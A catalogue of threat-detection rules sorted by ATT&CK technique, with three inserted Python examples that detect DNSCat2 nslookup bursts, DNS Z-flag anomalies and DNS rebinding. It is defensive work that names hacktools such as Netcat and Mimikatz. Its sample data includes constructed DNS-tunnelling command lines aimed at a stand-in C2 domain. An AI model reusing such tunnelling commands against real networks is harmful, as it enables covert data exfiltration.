  • Metasploit Or Impacket Service Installation Via SMB PsExec - Level: high
    Description: Detects usage of Metasploit SMB PsExec (exploit/windows/smb/psexec) and Impacket psexec.py by triggering on specific service installation
  • PSEXEC Remote Execution File Artefact - Level: high
    Description: Detects creation of the PSEXEC key file, which is created any time a PsExec command is executed. It gets written to the file system and will be recorded in the USN Journal on the target system.
  • Rundll32 Execution Without Parameters - Level: high
    Description: Detects rundll32 execution without parameters as observed when running Metasploit windows/smb/psexec exploit module
  • SMB over QUIC Via PowerShell Script - Level: medium
    Description: Detects the mounting of Windows SMB shares over QUIC, which can be an unexpected event in some enterprise environments
  • SMB over QUIC Via Net.EXE - Level: medium
    Description: Detects the mounting of Windows SMB shares over QUIC, which can be an unexpected event in some enterprise environments.
  • Metasploit Or Impacket Service Installation Via SMB PsExec - Level: high
    Description: Detects usage of Metasploit SMB PsExec (exploit/windows/smb/psexec) and Impacket psexec.py by triggering on specific service installation
attack.g0069 6
Show Rules (6)
  • CMSTP Execution Process Access - Level: high
    Description: Detects various indicators of Microsoft Connection Manager Profile Installer execution
  • CMSTP Execution Process Creation - Level: high
    Description: Detects various indicators of Microsoft Connection Manager Profile Installer execution
  • CMSTP UAC Bypass via COM Object Access - Level: high
    Description: Detects UAC Bypass Attempt Using Microsoft Connection Manager Profile Installer Autoelevate-capable COM Objects (e.g. UACMe ID of 41, 43, 58 or 65)
  • CMSTP Execution Registry Event - Level: high
    Description: Detects various indicators of Microsoft Connection Manager Profile Installer execution
  • Potential MuddyWater APT Activity - Level: high
    Description: Detects potential Muddywater APT activity
  • MERCURY APT Activity - Level: high
    Description: Detects suspicious command line patterns seen being used by MERCURY APT
attack.t1119 5
Show Rules (5)
  • iOS Implant URL Pattern - Level: critical
    Description: Detects URL pattern used by iOS Implant
  • Automated Collection Command PowerShell - Level: medium
    Description: Once established within a system or network, an adversary may use automated techniques for collecting internal data.
  • Recon Information for Export with PowerShell - Level: medium
    Description: Once established within a system or network, an adversary may use automated techniques for collecting internal data
  • Automated Collection Command Prompt - Level: medium
    Description: Once established within a system or network, an adversary may use automated techniques for collecting internal data.
  • Recon Information for Export with Command Prompt - Level: medium
    Description: Once established within a system or network, an adversary may use automated techniques for collecting internal data.
attack.t1584 5
Show Rules (5)
  • Search-ms and WebDAV Suspicious Indicators in URL - Level: high
    Description: Detects URL pattern used by search(-ms)/WebDAV initial access campaigns.
  • Program Executions in Suspicious Folders - Level: medium
    Description: Detects program executions in suspicious non-program folders related to malware or hacking activity
  • Suspicious External WebDAV Execution - Level: high
    Description: Detects executables launched from external WebDAV shares using the WebDAV Explorer integration, commonly seen in initial access campaigns.
  • Windows Update Error - Level: informational
    Description: Detects Windows update errors including installation failures and connection issues. Defenders should observe this in case critical update KBs aren't installed.
  • WebDAV Temporary Local File Creation - Level: medium
    Description: Detects the creation of WebDAV temporary files with potentially suspicious extensions
attack.g0032 5
Show Rules (5)
  • Lazarus Activity Apr21 - Level: high
    Description: Detects different process creation events as described in Malwarebytes's threat report on Lazarus group activity
  • Lazarus Loaders - Level: critical
    Description: Detects different loaders as described in various threat reports on Lazarus group activity
  • Suspicious HWP Sub Processes - Level: high
    Description: Detects suspicious Hangul Word Processor (Hanword) sub processes that could indicate an exploitation
  • Lazarus Group Activity - Level: critical
    Description: Detects different process execution behaviors as described in various threat reports on Lazarus group activity
  • Lazarus APT DLL Sideloading Activity - Level: high
    Description: Detects sideloading of trojanized DLLs used in Lazarus APT campaign in the case of a Spanish aerospace company
attack.t1041 5
Show Rules (5)
  • OpenCanary - TFTP Request - Level: high
    Description: Detects instances where a TFTP service on an OpenCanary node has had a request.
  • Network Communication Initiated To Portmap.IO Domain - Level: medium
    Description: Detects an executable accessing the portmap.io domain, which could be a sign of unauthorized C2 traffic or data exfiltration by malicious actors.
  • Equation Group C2 Communication - Level: high
    Description: Detects communication to C2 servers mentioned in the operational notes of the ShadowBroker leak of EquationGroup C2 tools
  • Tunneling Tool Execution - Level: medium
    Description: Detects the execution of well known tools that can be abused for data exfiltration and tunneling.
  • DNSCat2 Powershell Implementation Detection Via Process Creation - Level: high
    Description: The PowerShell implementation of DNSCat2 calls nslookup to craft queries. Counting nslookup processes spawned by PowerShell will show hundreds or thousands of instances if PS DNSCat2 is active locally.
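The DNSCat2 entry above describes the detection as a count: a PowerShell process spawning hundreds or thousands of nslookup children. The following Python is an added example, not code from this report or from the Sigma project, that applies a sliding-window count over process-creation events grouped by parent PID, so a burst from one PowerShell parent stands out from scattered administrative lookups. The event records, PIDs and command lines are constructed; the 60-second window and threshold of 20 are assumptions to tune per environment.

```python
"""Count nslookup children per PowerShell parent in a sliding window (added example)."""
from collections import defaultdict, deque
from typing import Dict, Iterable, List

POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe", "powershell_ise.exe"}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def make_event(ts: float, parent_pid: int, parent_image: str, cmdline: str) -> Dict:
    """Build one Sysmon Event ID 1 style record for an nslookup.exe start."""
    return {"ts": ts, "parent_pid": parent_pid, "parent_image": parent_image,
            "image": r"C:\Windows\System32\nslookup.exe", "cmdline": cmdline}


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CMD = r"C:\Windows\System32\cmd.exe"

# Constructed sample process-creation events, not real telemetry.
SAMPLE_EVENTS: List[Dict] = (
    # PID 4242: a PowerShell DNSCat2 session firing a TXT lookup every half second
    [make_event(i * 0.5, 4242, PS, f"nslookup -type=TXT {i:04x}deadbeef.c2.example") for i in range(40)]
    # PID 5555: an admin script doing a handful of lookups
    + [make_event(10.0 + i, 5555, PS, "nslookup dc01.corp.example") for i in range(3)]
    # PID 7777: many lookups, but the parent is cmd.exe, not PowerShell
    + [make_event(20.0 + i * 0.1, 7777, CMD, "nslookup fileserver.corp.example") for i in range(30)]
)


def nslookup_bursts(events: Iterable[Dict], window_seconds: float = 60.0,
                    threshold: int = 20) -> Dict[int, int]:
    """Return {parent_pid: peak count} for PowerShell parents reaching the threshold."""
    per_parent: Dict[int, List[float]] = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["ts"]):
        if basename(ev["image"]) != "nslookup.exe":
            continue
        if basename(ev["parent_image"]) not in POWERSHELL_IMAGES:
            continue
        per_parent[ev["parent_pid"]].append(ev["ts"])

    alerts: Dict[int, int] = {}
    for pid, times in per_parent.items():
        window: deque = deque()
        peak = 0
        for t in times:  # times are sorted; slide the window forward
            window.append(t)
            while t - window[0] > window_seconds:
                window.popleft()
            peak = max(peak, len(window))
        if peak >= threshold:
            alerts[pid] = peak
    return alerts


if __name__ == "__main__":
    for pid, peak in nslookup_bursts(SAMPLE_EVENTS).items():
        print(f"parent PID {pid}: {peak} nslookup children inside the window")
```

Keying on parent PID rather than on the nslookup command line keeps the check independent of the encoding DNSCat2 uses for its labels; the command lines are retained in the events only for the analyst.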
attack.t1558 5
Show Rules (5)
  • Antivirus Password Dumper Detection - Level: critical
    Description: Detects a highly relevant Antivirus alert that reports a password dumper. This event must not be ignored just because the AV has blocked the malware; investigate how it got there in the first place.
  • Replay Attack Detected - Level: high
    Description: Detects a possible Kerberos replay attack on the domain controllers when a "KRB_AP_ERR_REPEAT" Kerberos response is sent to the client.
  • HackTool - Mimikatz Kirbi File Creation - Level: critical
    Description: Detects the creation of files produced by mimikatz, such as ".kirbi", "mimilsa.log", etc.
  • Uncommon Outbound Kerberos Connection - Level: medium
    Description: Detects uncommon outbound network activity via Kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.
  • User with Privileges Logon - Level: low
    Description: Detects logons with "Special groups" and "Special Privileges", which can be thought of as Administrator groups or privileges.
attack.t1550 5
Show Rules (5)
  • AWS STS AssumeRole Misuse - Level: low
    Description: Identifies the suspicious use of AssumeRole. Attackers could move laterally and escalate privileges.
  • AWS STS GetSessionToken Misuse - Level: low
    Description: Identifies the suspicious use of GetSessionToken. Tokens could be created and used by attackers to move laterally and escalate privileges.
  • AWS Suspicious SAML Activity - Level: medium
    Description: Identifies when suspicious SAML activity has occurred in AWS. An adversary could gain backdoor access via SAML.
  • Outgoing Logon with New Credentials - Level: low
    Description: Detects logon events that specify new credentials
  • User with Privileges Logon - Level: low
    Description: Detects logons with "Special groups" and "Special Privileges", which can be thought of as Administrator groups or privileges.
attack.t1573 5
Show Rules (5)
  • Activity from Suspicious IP Addresses - Level: medium
    Description: Detects when Microsoft Cloud App Security reports that users were active from an IP address identified as risky by Microsoft Threat Intelligence. These IP addresses are involved in malicious activities, such as botnet C&C, and may indicate a compromised account.
  • Activity from Anonymous IP Addresses - Level: medium
    Description: Detects when Microsoft Cloud App Security reports that users were active from an IP address that has been identified as an anonymous proxy IP address.
  • Activity from Infrequent Country - Level: medium
    Description: Detects when Microsoft Cloud App Security reports that an activity occurred from a location that was not recently, or never, visited by any user in the organization.
  • Suspicious SSL Connection - Level: low
    Description: Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol.
  • Potential Pikabot C2 Activity - Level: high
    Description: Detects the execution of rundll32 that leads to an external network connection. The malware Pikabot has been seen to use this technique to initiate C2-communication through hard-coded Windows binaries.
attack.g0020 5
Show Rules (5)
  • Equation Group Indicators - Level: high
    Description: Detects suspicious shell commands used in various Equation Group scripts and tools
  • Equation Group C2 Communication - Level: high
    Description: Detects communication to C2 servers mentioned in the operational notes of the ShadowBroker leak of EquationGroup C2 tools
  • Equation Group DLL_U Export Function Load - Level: critical
    Description: Detects a specific export function name used by one of EquationGroup tools
  • Potential Operation Triangulation C2 Beaconing Activity - DNS - Level: high
    Description: Detects potential beaconing activity to domains used in 0day attacks on iOS devices and revealed by Kaspersky and the FSB
  • Potential Operation Triangulation C2 Beaconing Activity - Proxy - Level: high
    Description: Detects potential beaconing activity to domains used in 0day attacks on iOS devices and revealed by Kaspersky and the FSB
attack.t1557 5
Show Rules (5)
  • Cisco BGP Authentication Failures - Level: low
    Description: Detects BGP failures which may be indicative of brute force attacks to manipulate routing
  • Cisco LDP Authentication Failures - Level: low
    Description: Detects LDP failures which may be indicative of brute force attacks to manipulate MPLS labels
  • Huawei BGP Authentication Failures - Level: low
    Description: Detects BGP failures which may be indicative of brute force attacks to manipulate routing.
  • Juniper BGP Missing MD5 - Level: low
    Description: Detects Juniper BGP sessions missing an MD5 digest, which may be indicative of brute force attacks to manipulate routing.
  • Potential Suspicious Activity Using SeCEdit - Level: medium
    Description: Detects potentially suspicious behaviour using secedit.exe, such as exporting or modifying the security policy.
attack.t1649 5
Show Rules (5)
  • Certificate Private Key Acquired - Level: medium
    Description: Detects when an application acquires a certificate private key
  • Certificate Exported From Local Certificate Store - Level: medium
    Description: Detects when an application exports a certificate (and potentially the private key as well) from the local Windows certificate store.
  • HackTool - Certify Execution - Level: high
    Description: Detects Certify, a tool for Active Directory certificate abuse, based on PE metadata characteristics and common command line arguments.
  • HackTool - Certipy Execution - Level: high
    Description: Detects Certipy, a tool for Active Directory Certificate Services enumeration and abuse, based on PE metadata characteristics and common command line arguments.
  • User with Privileges Logon - Level: low
    Description: Detects logons with "Special groups" and "Special Privileges", which can be thought of as Administrator groups or privileges.
attack.t1220 5
Show Rules (5)
  • WMIC Loading Scripting Libraries - Level: medium
    Description: Detects threat actors proxy-executing code and bypassing application controls by leveraging wmic and the `/FORMAT` argument switch to download and execute an XSL file (i.e. JS, VBS, etc.).
  • Msxsl.EXE Execution - Level: medium
    Description: Detects the execution of the MSXSL utility. This can be used to execute Extensible Stylesheet Language (XSL) files. These files are commonly used to describe the processing and rendering of data within XML files. Adversaries can abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses.
  • Remote XSL Execution Via Msxsl.EXE - Level: high
    Description: Detects the execution of the "msxsl" binary with an "http" keyword in the command line. This might indicate a potential remote execution of XSL files.
  • Potential SquiblyTwo Technique Execution - Level: medium
    Description: Detects potential SquiblyTwo attack technique with possible renamed WMIC via Imphash and OriginalFileName fields
  • XSL Script Execution Via WMIC.EXE - Level: medium
    Description: Detects the execution of WMIC with the "format" flag to potentially load XSL files. Adversaries abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses. Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files.
attack.t1615 5
Show Rules (5)
  • Suspicious GPO Discovery With Get-GPO - Level: low
    Description: Detects use of Get-GPO to get one GPO or all the GPOs in a domain.
  • Gpresult Display Group Policy Information - Level: medium
    Description: Detects cases in which a user uses the built-in Windows utility gpresult to display the Resultant Set of Policy (RSoP) information
  • HackTool - SharpUp PrivEsc Tool Execution - Level: critical
    Description: Detects the use of SharpUp, a tool for local privilege escalation
  • Potential Reconnaissance Activity Via GatherNetworkInfo.VBS - Level: medium
    Description: Detects execution of the built-in script located in "C:\Windows\System32\gatherNetworkInfo.vbs", which can be used to gather information about the target machine.
  • Suspicious Reconnaissance Activity Via GatherNetworkInfo.VBS - Level: high
    Description: Detects execution of the built-in script located in "C:\Windows\System32\gatherNetworkInfo.vbs", which can be used to gather information about the target machine.
attack.t1095 4
Show Rules (4)
  • Netcat The Powershell Version - PowerShell Module - Level: medium
    Description: Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network
  • Suspicious DNS Z Flag Bit Set - Level: medium
    Description: The DNS Z flag is a bit in the DNS protocol header that, per the IETF design, is reserved (unused). Although it has recently been used alongside DNSSEC, a value other than 0 should be rare. If it is set to non-zero and DNSSEC is in use, excluding the legitimate domains is low effort and high reward. Determine whether multiple of these events occurred in a short period of time to establish whether this was a one-off or part of a larger pattern. This Sigma query is designed to accompany the Corelight Threat Hunting Guide, which can be found here: https://www3.corelight.com/corelights-introductory-guide-to-threat-hunting-with-zeek-bro-logs
  • Netcat The Powershell Version - Level: medium
    Description: Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network
  • PUA - Netcat Suspicious Execution - Level: high
    Description: Detects execution of Netcat. Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network
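The "Suspicious DNS Z Flag Bit Set" entries in this group and under attack.t1571 hunt on the reserved Z bit of the DNS header. The Python below is an added example, not code from this report or from the Sigma project: it parses the 12-byte header as laid out in RFC 1035 (with the AD and CD bits that RFC 2535 carved out of the original reserved field) so that a non-zero Z is distinguished from the DNSSEC AD bit the description mentions, and it applies the allowlisting the description recommends. The packets are constructed in the block; the allowlisted domain is an assumption.

```python
"""Parse DNS headers and flag messages with the reserved Z bit set (added example)."""
import struct
from typing import Dict, Iterable, List, Tuple

# Flag word layout (RFC 1035 4.1.1; AD/CD from RFC 2535):
#  15 QR | 14-11 Opcode | 10 AA | 9 TC | 8 RD | 7 RA | 6 Z | 5 AD | 4 CD | 3-0 RCODE
FLAG_QR, FLAG_AA, FLAG_TC, FLAG_RD = 0x8000, 0x0400, 0x0200, 0x0100
FLAG_RA, FLAG_Z, FLAG_AD, FLAG_CD = 0x0080, 0x0040, 0x0020, 0x0010


def parse_dns_header(packet: bytes) -> Dict[str, int]:
    """Decode the fixed 12-byte DNS header into its fields."""
    if len(packet) < 12:
        raise ValueError("DNS message shorter than the 12-byte header")
    txid, flags, qd, an, ns, ar = struct.unpack("!HHHHHH", packet[:12])
    return {
        "id": txid, "flags": flags,
        "qr": (flags & FLAG_QR) >> 15, "opcode": (flags >> 11) & 0xF,
        "aa": (flags & FLAG_AA) >> 10, "tc": (flags & FLAG_TC) >> 9,
        "rd": (flags & FLAG_RD) >> 8, "ra": (flags & FLAG_RA) >> 7,
        "z": (flags & FLAG_Z) >> 6, "ad": (flags & FLAG_AD) >> 5, "cd": (flags & FLAG_CD) >> 4,
        "rcode": flags & 0xF,
        "qdcount": qd, "ancount": an, "nscount": ns, "arcount": ar,
    }


def build_message(txid: int, qname: str, flags: int) -> bytes:
    """Build a minimal one-question DNS message (A/IN) with the given flag word."""
    header = struct.pack("!HHHHHH", txid, flags, 1, 0, 0, 0)
    labels = b"".join(bytes([len(lbl)]) + lbl.encode("ascii") for lbl in qname.rstrip(".").split("."))
    return header + labels + b"\x00" + struct.pack("!HH", 1, 1)


def qname_of(packet: bytes) -> str:
    """Read the first question name (the first question is never compressed)."""
    pos, labels = 12, []
    while packet[pos]:
        n = packet[pos]
        labels.append(packet[pos + 1:pos + 1 + n].decode("ascii"))
        pos += 1 + n
    return ".".join(labels)


# Constructed samples: a normal recursive query, a DNSSEC-validated answer (AD set, Z clear),
# and two messages carrying the reserved bit. Source addresses are placeholders.
SAMPLE_PACKETS: List[Tuple[str, bytes]] = [
    ("10.0.0.5", build_message(0x1A2B, "www.example.com", FLAG_RD)),
    ("10.0.0.5", build_message(0x1A2B, "www.example.com", FLAG_QR | FLAG_RD | FLAG_RA | FLAG_AD)),
    ("10.0.0.9", build_message(0xBEEF, "tunnel.example.net", FLAG_RD | FLAG_Z)),
    ("10.0.0.9", build_message(0xBEEF, "allowed-vendor.example.org", FLAG_RD | FLAG_Z)),
]

# Domains known to emit odd flag values in this environment (assumption).
Z_ALLOWLIST = {"allowed-vendor.example.org"}


def z_flag_hits(packets: Iterable[Tuple[str, bytes]], allowlist=Z_ALLOWLIST) -> List[Dict]:
    """Return one record per message whose Z bit is set and whose qname is not allowlisted."""
    hits = []
    for src, pkt in packets:
        hdr = parse_dns_header(pkt)
        if hdr["z"] == 0:
            continue
        name = qname_of(pkt) if hdr["qdcount"] else ""
        if name in allowlist:
            continue
        hits.append({"src": src, "qname": name, "id": hdr["id"], "flags": hdr["flags"], "ad": hdr["ad"]})
    return hits


if __name__ == "__main__":
    for hit in z_flag_hits(SAMPLE_PACKETS):
        print(f"Z bit set: src={hit['src']} qname={hit['qname']} flags=0x{hit['flags']:04x}")
```

The second sample shows why the AD bit must be masked separately: a validating resolver's answer carries 0x81A0, which leaves Z clear, whereas the tunnel query carries 0x0140 and is the only hit after allowlisting.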
attack.t1069 4
Show Rules (4)
  • AzureHound PowerShell Commands - Level: high
    Description: Detects the execution of AzureHound in PowerShell, a tool to gather data from Azure for BloodHound
  • Malicious PowerShell Commandlets - PoshModule - Level: high
    Description: Detects Commandlet names from well-known PowerShell exploitation frameworks
  • Malicious PowerShell Commandlets - ScriptBlock - Level: high
    Description: Detects Commandlet names from well-known PowerShell exploitation frameworks
  • Malicious PowerShell Commandlets - ProcessCreation - Level: high
    Description: Detects Commandlet names from well-known PowerShell exploitation frameworks
attack.t1114 4
Show Rules (4)
  • PST Export Alert Using eDiscovery Alert - Level: medium
    Description: Alert on when a user has performed an eDiscovery search or exported a PST file from the search. This PST file usually has sensitive information including email body content
  • PST Export Alert Using New-ComplianceSearchAction - Level: medium
    Description: Alerts when a user has performed an export of a search using 'New-ComplianceSearchAction' with the '-Export' flag. This detection will catch PST export even if the 'eDiscovery search or exported' alert is disabled in O365. This rule applies to ExchangePowerShell usage and to the cloud.
  • Hacktool Ruler - Level: high
    Description: Detects events that are generated when using the hacktool Ruler by SensePost.
  • Exchange PowerShell Snap-Ins Usage - Level: high
    Description: Detects adding and using Exchange PowerShell snap-ins to export mailbox data. As seen used by HAFNIUM and APT27
attack.t1189 4
Show Rules (4)
  • Suspicious Browser Child Process - MacOS - Level: medium
    Description: Detects suspicious child processes spawned from browsers. This could be a result of a potential web browser exploitation.
  • Flash Player Update from Suspicious Location - Level: high
    Description: Detects a Flash Player update from an unofficial location.
  • Cross Site Scripting Strings - Level: high
    Description: Detects XSS attempts injected via GET requests in access logs
  • Possible DNS Rebinding - Level: medium
    Description: Detects a domain returning several different DNS answers with IPs from both internal and external networks. Normally, a DNS answer carries a TTL >100 (the record stays in the host cache for the duration of the TTL).
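The "Possible DNS Rebinding" entry above describes the indicator as one name resolving to both internal and external addresses, typically with a short TTL. The Python below is an added example, not code from this report or from the Sigma project: it groups Zeek-style dns.log answers by query name and reports names with a mixed internal/external answer set, carrying the minimum TTL so that split-horizon names with long TTLs can be deprioritised. The records are constructed; the internal address ranges and the 100-second TTL threshold (taken from the description) are the assumptions.

```python
"""Find names that resolve to both internal and external addresses (added example)."""
import ipaddress
from collections import defaultdict
from typing import Dict, Iterable, List

# Address space treated as "internal": RFC 1918, loopback, link-local and IPv6 analogues
# (assumption; extend with any public ranges the organisation routes internally).
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16",
    "::1/128", "fc00::/7", "fe80::/10",
)]


def is_internal(ip: str) -> bool:
    """True for addresses inside INTERNAL_NETS; raises ValueError for non-addresses."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


# Constructed dns.log-style records; the names and addresses (documentation ranges) are not real hosts.
SAMPLE_DNS_LOG: List[Dict] = [
    {"ts": 1700000000.0, "query": "cdn.example.net", "answers": ["203.0.113.10"], "TTLs": [300]},
    {"ts": 1700000001.0, "query": "rebind.example.org", "answers": ["198.51.100.7"], "TTLs": [1]},
    {"ts": 1700000003.0, "query": "rebind.example.org", "answers": ["192.168.1.20"], "TTLs": [1]},
    {"ts": 1700000004.0, "query": "intranet.example.local", "answers": ["10.0.0.5"], "TTLs": [3600]},
    {"ts": 1700000005.0, "query": "split.example.com", "answers": ["203.0.113.20", "10.1.2.3"], "TTLs": [3600, 3600]},
    {"ts": 1700000006.0, "query": "alias.example.com", "answers": ["cdn.example.net", "203.0.113.10"], "TTLs": [60, 300]},
]


def find_rebinding_candidates(records: Iterable[Dict], ttl_threshold: int = 100) -> Dict[str, Dict]:
    """Group answers per name; report names seen with both internal and external addresses."""
    seen: Dict[str, Dict] = defaultdict(lambda: {"internal": set(), "external": set(), "min_ttl": None})
    for rec in records:
        entry = seen[rec["query"].lower().rstrip(".")]
        for answer, ttl in zip(rec.get("answers", []), rec.get("TTLs", [])):
            try:
                internal = is_internal(answer)
            except ValueError:
                continue  # CNAME or other non-address answer
            entry["internal" if internal else "external"].add(answer)
            entry["min_ttl"] = ttl if entry["min_ttl"] is None else min(entry["min_ttl"], ttl)

    findings: Dict[str, Dict] = {}
    for name, e in seen.items():
        if e["internal"] and e["external"]:
            findings[name] = {
                "internal": sorted(e["internal"]), "external": sorted(e["external"]),
                "min_ttl": e["min_ttl"], "low_ttl": e["min_ttl"] < ttl_threshold,
            }
    return findings


if __name__ == "__main__":
    for name, info in find_rebinding_candidates(SAMPLE_DNS_LOG).items():
        tag = "LOW TTL" if info["low_ttl"] else "long TTL, likely split-horizon"
        print(f"{name}: internal={info['internal']} external={info['external']} "
              f"min_ttl={info['min_ttl']} ({tag})")
```

The internal ranges are listed explicitly rather than relying on ipaddress.is_private, which also classifies the documentation ranges (192.0.2.0/24, 198.51.100.0/24, 203.0.113.0/24) as private and would mislabel the sample external answers.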
attack.t1553 4
Show Rules (4)
  • Suspicious Execution via macOS Script Editor - Level: medium
    Description: Detects when the macOS Script Editor utility spawns an unusual child process.
  • Renamed BOINC Client Execution - Level: medium
    Description: Detects the execution of a renamed BOINC binary.
  • Suspicious RazerInstaller Explorer Subprocess - Level: high
    Description: Detects an explorer.exe sub-process of the RazerInstaller software, which can be invoked from the installer to select a different installation folder but can also be exploited to escalate privileges to LOCAL SYSTEM.
  • Potential BOINC Software Execution (UC-Berkeley Signature) - Level: informational
    Description: Detects the use of software that is related to the University of California, Berkeley via metadata information. This indicates it may be related to BOINC software and can be used maliciously if unauthorized.
attack.t1211 4
  • Microsoft Malware Protection Engine Crash - Level: high
    Description: This rule detects a suspicious crash of the Microsoft Malware Protection Engine
  • Audit CVE Event - Level: critical
    Description: Detects events generated by user-mode applications when they call the CveEventWrite API because a known vulnerability is being exploited. MS started using this log in Jan. 2020 with CVE-2020-0601 (a Windows CryptoAPI vulnerability). Unfortunately, that is about the only instance of CVEs being written to this log.
  • Microsoft Malware Protection Engine Crash - WER - Level: high
    Description: This rule detects a suspicious crash of the Microsoft Malware Protection Engine
  • Writing Of Malicious Files To The Fonts Folder - Level: medium
    Description: Monitors for possible malicious files being hidden in the C:\Windows\Fonts\ location. This folder does not require admin privileges to be written to or executed from.
attack.t1072 4
  • Restricted Software Access By SRP - Level: high
    Description: Detects restricted access to applications by the Software Restriction Policies (SRP) policy
  • Suspicious Csi.exe Usage - Level: medium
    Description: Csi.exe is a signed binary from Microsoft that comes with Visual Studio and provides C# interactive capabilities. It can be used to run C# code from a file passed as a parameter on the command line. An early version of this utility, provided with the Microsoft "Roslyn" Community Technology Preview, was named 'rcsi.exe'.
  • PDQ Deploy Remote Administration Tool Execution - Level: medium
    Description: Detects use of the PDQ Deploy remote administration tool
  • PUA - Radmin Viewer Utility Execution - Level: medium
    Description: Detects the execution of Radmin which can be abused by an adversary to remotely control Windows machines
attack.s0139 4
  • Hidden Executable In NTFS Alternate Data Stream - Level: medium
    Description: Detects the creation of an ADS (Alternate Data Stream) that contains an executable by looking at a non-empty Imphash
  • Suspicious File Download From File Sharing Websites - File Stream - Level: high
    Description: Detects the download of a suspicious file type from a well-known file and paste sharing domain
  • Unusual File Download From File Sharing Websites - File Stream - Level: medium
    Description: Detects the download of a suspicious file type from a well-known file and paste sharing domain
  • HackTool Named File Stream Created - Level: high
    Description: Detects the creation of a named file stream with the imphash of a well-known hack tool
attack.t1008 4
  • New Outlook Macro Created - Level: medium
    Description: Detects the creation of a macro file for Outlook.
  • Suspicious Outlook Macro Created - Level: high
    Description: Detects the creation of a macro file for Outlook.
  • Potential Persistence Via Outlook LoadMacroProviderOnBoot Setting - Level: high
    Description: Detects the modification of Outlook setting "LoadMacroProviderOnBoot" which if enabled allows the automatic loading of any configured VBA project/module
  • Outlook Macro Execution Without Warning Setting Enabled - Level: high
    Description: Detects the modification of Outlook security setting to allow unprompted execution of macros.
attack.t1518 4
  • HackTool - WinPwn Execution - ScriptBlock - Level: high
    Description: Detects scriptblock text keywords indicative of potential usage of the tool WinPwn, a tool for Windows and Active Directory reconnaissance and exploitation.
  • Detected Windows Software Discovery - PowerShell - Level: medium
    Description: Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable.
  • HackTool - WinPwn Execution - Level: high
    Description: Detects command line keywords indicative of potential usage of the tool WinPwn, a tool for Windows and Active Directory reconnaissance and exploitation.
  • Detected Windows Software Discovery - Level: medium
    Description: Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable.
attack.t1569 4
  • Psexec Execution - Level: medium
    Description: Detects the user agreement acceptance flag in the PsExec command line
  • Possible CVE-2021-1675 Print Spooler Exploitation - Level: high
    Description: Detects events of driver load errors in print service logs that could be a sign of successful exploitation attempts of print spooler vulnerability CVE-2021-1675
  • CVE-2021-1675 Print Spooler Exploitation - Level: critical
    Description: Detects driver load events in the print service operational log that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675
  • CVE-2021-1675 Print Spooler Exploitation IPC Access - Level: critical
    Description: Detects remote printer driver loads from Detailed File Share events in the Security log that are a sign of successful exploitation attempts against print spooler vulnerabilities CVE-2021-1675 and CVE-2021-34527
attack.t1560 4
  • Compressed File Creation Via Tar.EXE - Level: low
    Description: Detects execution of "tar.exe" in order to create a compressed file. Adversaries may abuse various utilities to compress or encrypt data before exfiltration.
  • Compressed File Extraction Via Tar.EXE - Level: low
    Description: Detects execution of "tar.exe" in order to extract a compressed file. Adversaries may abuse various utilities in order to decompress data to avoid detection.
  • Conti NTDS Exfiltration Command - Level: high
    Description: Detects a command used by Conti to exfiltrate NTDS
  • Compress-Archive Cmdlet Execution - Level: low
    Description: Detects PowerShell scripts that make use of the "Compress-Archive" cmdlet in order to compress folders and files. An adversary might compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.
attack.t1498 3
  • Deployment Deleted From Kubernetes Cluster - Level: low
    Description: Detects the removal of a deployment from a Kubernetes cluster. This could indicate disruptive activity aiming to impact business operations.
  • OpenCanary - NTP Monlist Request - Level: high
    Description: Detects instances where an NTP service on an OpenCanary node has received an NTP monlist request.
  • Potential BlackByte Ransomware Activity - Level: high
    Description: Detects command line patterns used by BlackByte ransomware in different operations
attack.t1136 3
  • New Kubernetes Service Account Created - Level: low
    Description: Detects creation of a new Kubernetes service account, which could indicate an attacker's attempt to persist within a cluster.
  • AWS ElastiCache Security Group Created - Level: low
    Description: Detects when an ElastiCache security group has been created.
  • ESXi Account Creation Via ESXCLI - Level: medium
    Description: Detects user account creation on ESXi system via esxcli
attack.t1565 3
  • AWS EC2 Disable EBS Encryption - Level: medium
    Description: Identifies disabling of default Amazon Elastic Block Store (EBS) encryption in the current region. Disabling default encryption does not change the encryption status of your existing volumes.
  • Google Cloud Re-identifies Sensitive Information - Level: medium
    Description: Identifies when sensitive information is re-identified in Google Cloud.
  • Powershell Add Name Resolution Policy Table Rule - Level: high
    Description: Detects PowerShell scripts that add a Name Resolution Policy Table (NRPT) rule for the specified namespace. This bypasses the default DNS server and uses a specified server for answering the query.
attack.t1526 3
  • Discovery Using AzureHound - Level: high
    Description: Detects AzureHound (A BloodHound data collector for Microsoft Azure) activity via the default User-Agent that is used during its operation after successful authentication.
  • Github Self Hosted Runner Changes Detected - Level: low
    Description: A self-hosted runner is a system that you deploy and manage to execute jobs from GitHub Actions on GitHub.com. This rule detects changes to self-hosted runner configurations in the environment. Once detected, a self-hosted runner configuration change should be validated from the GitHub UI, because the log entry may not provide full context.
  • PUA - Seatbelt Execution - Level: high
    Description: Detects the execution of the PUA/recon tool Seatbelt via PE information or command line parameters
attack.t1124 3
  • Cisco Discovery - Level: low
    Description: Find information about network devices that is not stored in config files
  • Discovery of a System Time - Level: low
    Description: Identifies use of various commands to query a system's time. This technique may be used before executing a scheduled task or to discover the time zone of a target system.
